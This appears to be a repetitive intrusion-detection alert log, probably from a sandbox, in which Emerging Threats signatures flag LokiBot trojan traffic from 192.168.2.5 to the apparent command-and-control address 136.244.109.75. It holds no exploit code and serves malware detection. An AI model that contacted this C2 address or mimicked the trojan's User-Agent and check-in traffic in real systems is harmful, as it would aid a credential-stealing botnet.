Timestamp:	04/17/24-03:18:19.349314
SID:	2021641
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:07.152097
SID:	2021641
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:28.314689
SID:	2021641
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:04.154071
SID:	2025381
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:46.390927
SID:	2024313
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:50.868001
SID:	2024313
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:53.924913
SID:	2025381
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:46.390927
SID:	2024318
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:02.984312
SID:	2024318
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:02.659962
SID:	2021641
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:17.652364
SID:	2025381
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:40.424546
SID:	2025381
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:23.842884
SID:	2024318
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:37.366005
SID:	2024313
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:32.922641
SID:	2021641
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:50.868001
SID:	2024318
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:23.842884
SID:	2024313
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:37.366005
SID:	2024318
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:31.711088
SID:	2025381
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:36.230211
SID:	2025381
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:56.686682
SID:	2024313
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:26.814059
SID:	2025381
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:22.632421
SID:	2024313
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:47.288202
SID:	2021641
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:47.882152
SID:	2021641
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:22.368817
SID:	2024318
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:22.368817
SID:	2024313
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:55.317148
SID:	2021641
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:04.956657
SID:	2024313
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:05.666467
SID:	2021641
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:25.655732
SID:	2025381
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:39.820705
SID:	2021641
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:22.632421
SID:	2024318
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:56.686682
SID:	2024318
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:04.956657
SID:	2024318
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:25.351055
SID:	2025381
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:29.847908
SID:	2021641
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:11.695407
SID:	2025381
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:16.164912
SID:	2025381
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:28.661125
SID:	2024318
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:37.986053
SID:	2024313
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:28.661125
SID:	2024313
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:19.154295
SID:	2021641
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:42.872387
SID:	2024313
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:33.230598
SID:	2024318
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:33.230598
SID:	2024313
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:48.803719
SID:	2025381
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:14.663282
SID:	2021641
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:42.872387
SID:	2024318
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:10.136681
SID:	2021641
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:37.986053
SID:	2024318
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:50.302449
SID:	2024313
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:52.374211
SID:	2025381
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:24.136611
SID:	2021641
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:50.302449
SID:	2024318
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:53.372679
SID:	2025381
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:01.176692
SID:	2024313
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:08.603347
SID:	2024313
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:51.797146
SID:	2021641
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:43.385034
SID:	2021641
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:41.291392
SID:	2025381
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:01.176692
SID:	2024318
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:08.625526
SID:	2024313
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:17.867642
SID:	2024318
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:20.835118
SID:	2025381
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:52.381113
SID:	2021641
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:59.708947
SID:	2021641
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:20.757055
SID:	2025381
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:50.877994
SID:	2021641
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:08.603347
SID:	2024318
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:17.867642
SID:	2024313
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:44.338890
SID:	2021641
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:08.625526
SID:	2024318
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:11.616140
SID:	2025381
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:54.967221
SID:	2025381
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:53.759072
SID:	2024318
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:58.235959
SID:	2024313
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:19.349314
SID:	2024313
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:14.912121
SID:	2024313
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:55.317148
SID:	2025381
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:19.349314
SID:	2024318
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:11.695407
SID:	2024313
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:41.923839
SID:	2024313
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:28.661125
SID:	2025381
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:48.803719
SID:	2021641
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:53.759072
SID:	2024313
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:11.695407
SID:	2024318
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:53.372679
SID:	2024318
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:41.923839
SID:	2024318
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:53.372679
SID:	2024313
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:13.162928
SID:	2025381
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:37.366005
SID:	2021641
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:31.393355
SID:	2025381
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:10.084965
SID:	2021641
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:58.235959
SID:	2024318
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:14.912121
SID:	2024318
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:56.686682
SID:	2021641
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:29.847908
SID:	2024318
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:39.820705
SID:	2024318
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:22.632421
SID:	2021641
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:35.861538
SID:	2025381
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:43.385034
SID:	2025381
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:08.625526
SID:	2025381
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:22.368817
SID:	2021641
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:44.338890
SID:	2025381
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:59.708947
SID:	2025381
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:39.820705
SID:	2024313
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:16.378463
SID:	2025381
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:05.666467
SID:	2024318
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:04.956657
SID:	2021641
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:07.139176
SID:	2025381
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:30.128575
SID:	2021641
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:05.666467
SID:	2024313
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:29.847908
SID:	2024313
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:19.154295
SID:	2024318
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:46.390927
SID:	2025381
Source Port:	49789
